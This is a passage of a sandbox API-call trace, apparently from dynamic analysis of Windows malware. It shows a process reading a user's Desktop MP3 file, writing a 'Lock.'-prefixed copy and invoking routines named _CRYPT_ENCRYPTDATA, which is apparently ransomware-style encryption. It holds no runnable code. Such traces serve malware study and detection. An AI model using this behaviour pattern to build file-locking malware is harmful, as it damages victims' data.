[0211.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0211.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0211.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0211.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0211.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0211.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0211.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0211.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0211.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0211.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0211.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0211.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0211.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0211.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0211.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0211.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0211.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0211.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0211.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0211.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0211.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0211.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0211.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0211.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0211.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0211.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0211.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0211.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0211.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0211.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0211.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0211.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0211.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0211.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0211.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0211.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0211.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0211.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0211.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0211.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0211.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0211.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0211.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0211.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0211.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0211.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0211.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0211.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0211.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0211.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0211.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0211.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0211.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0211.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0211.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0211.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0211.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0211.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0211.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0211.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0211.516] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0211.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0211.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0211.516] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0211.516] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0211.516] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0211.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0211.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0211.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0211.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0211.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0211.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0211.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0211.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0211.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0211.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0211.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0211.518] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/WUNf8 S 6YDp2i.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\wunf8 s 6ydp2i.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0211.518] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.518] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0211.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0211.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0211.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0211.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0211.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0211.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0211.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0211.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0211.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0211.518] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0211.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0211.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0211.519] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0211.519] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0211.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0211.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0211.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0211.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0211.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0211.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0211.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0211.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0211.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0211.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0211.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0211.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0211.519] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0211.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0211.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0211.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f14010 [0211.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0211.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0211.520] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.WUNf8 S 6YDp2i.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.wunf8 s 6ydp2i.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0211.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0211.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0211.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0211.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0211.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0211.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0211.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0211.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0211.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0211.521] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0211.521] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.521] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0211.521] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0211.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0211.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0211.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0211.524] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0211.524] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0211.529] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x2cf6, lpOverlapped=0x0) returned 1 [0211.529] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0211.535] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0211.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0211.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0211.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0211.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0211.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12cf6) returned 0x2f24018 [0211.536] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0211.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0211.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0211.536] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0211.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0211.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0211.536] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0211.590] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0211.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0211.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0211.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0211.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0211.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0211.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0211.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0211.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0211.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0211.590] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0211.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0211.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0211.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0211.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0211.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0211.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0211.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0211.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0211.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0211.591] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0211.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0211.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0211.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0211.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0211.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0211.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0211.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0211.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0211.591] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.591] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.591] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.591] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0211.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0211.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0211.591] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.592] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0211.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80220 | out: hHeap=0x970000) returned 1 [0211.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0211.592] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.592] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0211.592] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.592] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0211.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0211.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0211.592] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.592] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0211.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0211.592] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.592] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 